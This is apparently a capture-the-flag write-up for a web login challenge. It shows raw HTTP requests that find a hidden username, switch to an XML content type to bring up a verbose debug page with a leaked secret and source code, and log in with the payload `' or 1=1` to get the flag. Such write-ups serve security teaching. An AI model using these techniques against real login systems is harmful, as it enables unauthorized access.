Can you get the flag from my login system? It's pretty wonky 


# Challenge
So navigating to the site, it's a simple login page, the RAT left us a message.
`The username can be found somewhere here on the page. The password? I don't know :D`

I had Burp running and set to unhide all hidden parameters, and there was a hidden parameter called :
`hiddenUser:cheesyAdmins`

Not much we can do here since we don't know the password
Let's just send a request to the server and see how it's done.

```http
POST /login HTTP/1.1
Host: 23.239.9.22:5007
Content-Length: 67
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://23.239.9.22:5007
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://23.239.9.22:5007/login
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
dnt: 1
sec-gpc: 1
Connection: close

hiddenUser=cheesyAdmins&username=cheesyAdmins&password=cheesyAdmins
```

What thrown me off instantly is it's also accepting XML content-type?
Let's try sending a XML request.
```http
POST /login HTTP/1.1
Host: 23.239.9.22:5007
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://23.239.9.22:5007
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://23.239.9.22:5007/login
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
dnt: 1
sec-gpc: 1
Connection: close
Content-Type: application/xml
Content-Length: 56

<user>cheesyAdmins</user>
<password>
test
</password>
```
And we get a very verbose error page!
To get more of the errors, check out the source code, here we can see some things that should have not been released to production

`SECRET = "aicniMoRgbVTvXx6lIM1"`
If the SECRET was used to create session cookies, we could forge our own cookies.

Now let's take a look at the function that is handing our login
```html
<pre class="line before"><span class="ws"></span>def login():</pre>

<pre class="line before"><span class="ws"> </span>error = &quot;&quot;</pre>

<pre class="line before"><span class="ws"> </span>if request.method == 'POST':</pre>

<pre class="line current"><span class="ws"> </span>if &quot;'&quot; in request.form['password']:</pre>

<pre class="line after"><span class="ws"> </span>error += &quot;SQL Error: Invalid query&lt;br&gt;&quot;</pre>

<pre class="line after"><span class="ws"></span> </pre>

<pre class="line after"><span class="ws"> </span>if request.form['username'] == 'cheesyAdmins' and &quot;' or 1=1&quot; in request.form['password'].lower():</pre>

<pre class="line after"><span class="ws"> </span>return redirect(url_for('home'))</pre>

<pre class="line after"><span class="ws"> </span>else:</pre></div>
```
Let's make it more better
```py
def login():
	error=";";
	if request.method =='POST':
		if "'" in request.form['password']:
			error += "SQL Error: Invalid Query <br>"
		if request.form['username'] == 'cheesyAdmins' and "' or 1=1" in request.form['password'].lower():
			return redirect(url_for('home'))
		else :
```
So it's not actually SQL injection, it's just error-ing out whenever there is a quote in our password.
But if our username is equal to cheesyAdmins and password is equal to `' or 1=1` then redirect us to home
So let's try that.
```http
POST /login HTTP/1.1
Host: 23.239.9.22:5007
Content-Length: 67
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://23.239.9.22:5007
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://23.239.9.22:5007/login
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
dnt: 1
sec-gpc: 1
Connection: close

hiddenUser=cheesyAdmins&username=cheesyAdmins&password=%27+or+1%3D1
```
And we're redirected to an endpoint called /JumbledMess
`flag{fs932jfsd8xc6z}`
